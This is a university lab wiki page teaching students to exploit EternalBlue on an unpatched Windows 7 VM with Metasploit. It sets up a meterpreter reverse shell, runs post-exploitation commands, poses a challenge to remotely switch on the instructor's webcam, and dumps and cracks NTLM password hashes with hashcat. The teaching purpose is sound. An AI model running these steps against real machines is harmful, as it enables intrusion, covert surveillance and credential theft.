EternalBlue Windows 7

From csn
Revision as of 00:26, 1 December 2021 by David (talk | contribs)
Jump to navigation Jump to search

In this lab, we will learn how to use the EternalBlue vulnerability on an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all windows versions. We will use Metasploit on Kali Linux to make this process a little easier.

This is for educational purposes only, attacking computers or equipment without permission is unethical and is against the law.

With great knowledge comes great responsibility.

  • EternalBlue
  • Linux
  • Security
  • Metasploit
  • Ethics

Setup

Log in using the outreach username and password.

Start the lab by opening VMware and opening the Windows 7 image and the Kali Linux image.

You can log into kali with:

username: kali
password: kali

Starting up Metasploit

On the Kali VM we are going to open the terminal and type the following commands:

service postgresql start
msfconsole

hint: the password is student

we are then going to use the following exploit on our machine:

use exploit/windows/smb/ms17_010_eternalblue

once selected we need to fill out some options for this to work:

options

your output should look like this:

Insert Picture here

We will set these options in the sections below.

Getting the IP address of your Windows 7 Machine

you will need to open command prompt and type:

ipconfig

we are looking for an ip address that looks like this 134.115.148.xxx (xxx being the last numbers)

Temperature Sensor
Windows 7 ip

















in this example you can see the ip address is 134.115.148.165

Setting the target to attack in Metasploit

In Kali Linux we now need to set the host to attack (the Windows 7 machine)

set rhosts 134.115.148.xxx

This will be the IP address you got earlier, it should output this:

Kali set rhost
Kali set rhost

















We will now set the payload which will infect the Windows 7 machine. This software will allow us to control the machine remotely

set payload windows/x64/meterpreter/reverse_tcp

We now need to tell Metasploit the IP address of our Kali Linux machine.

Getting the IP address in Kali Linux

Open a new terminal window and type this command to get the ip address:

ifconfig

We are looking for an ip address that looks like this 134.115.148.xxx (xxx being the last numbers)

Kali IP
Kali IP

















in this example you can see the ip address is 134.115.148.147

setting the local ip in Metasploit

in the terminal window on the kali machine type:

set lhost 134.115.148.xxx

then set the port:

set lport 4321

Running the exploit and controlling the Windows 7 machine

We are now going to run this exploit and can test out things like watching the screen or turning the webcam on remotely.

in the kali terminal run the exploit:

run

you should get this output:

 Insert picture here 

We now have control of the machine and you can try out some commands such as:

sysinfo

This will tell us about the type of Windows machine that is running

Try

screenshare

This will open a browser window where we can see what is on screen. Hit Ctrl+C to close this down.

Let's try creating a directory on Windows:

mkdir C:/Users/Murdoch/Desktop/1337-hacker

Now look on your Windows 7 Desktop. Can you see the directory that we just created?

To see all the possible options, issue a:

?

hint: to close a current command press control-c

Advanced: Turning on a remote Webcam on the Instructor's PC

How would you remotely turn on someone's webcam?

The instructor of the class may have a webcam installed. Can you turn on the instructor's webcam? You may need help with this.

Pivoting with Password Hashes

Many real-world hacks feature many pivot points. The infamous LinkedIn compromise was an example of this. A LinkedIn developer had put some LinkedIn credentials on a home machine. The compromise began when a soft target, a developers home machine, was compromised. The attackers then pivoted from there. In this next example, we will show you what this sort of a pivot can look like.

Again, if you are employed to protect a company network, it is very unlikely that they will be running unpatched Windows 7 machines. If they are doing this, you have a real problem on your hands. So there is little chance that this sort of machine would be seen on a large company network, but these will still exist at home, and that can be an attackers pivot point.

Let's extract the password hashes from the windows machine with

hashdump

Find the username LinkedIn. We think that this user may be reusing passwords between their home and work computers. If we can crack their home password, then maybe we can use the same password on a work machine. A password hash is a bit different from encryption. When we use encryption see use a key to hide the message. Hash functions are supposed to be one way, but they are still vulnerable to brute force attacks.

insert has pic here

We know that Windows 7 would hash passwords using an algorithm called NTLM.

Now lets manually extract the password hash

cca4d46bdf8ab23cb17704bfd93a10b9

Save this as a text file called linkedin_hash

Now we are going to crack it with hashcat, but before we do, I want us to download a password list. I have provided one for you here. You can get it with

wget https://csn.murdoch.edu.au/wordlist_names.txt
hashcat -m 1000 -a 0 -o win7_out.txt linkedin_hash wordlist_names.txt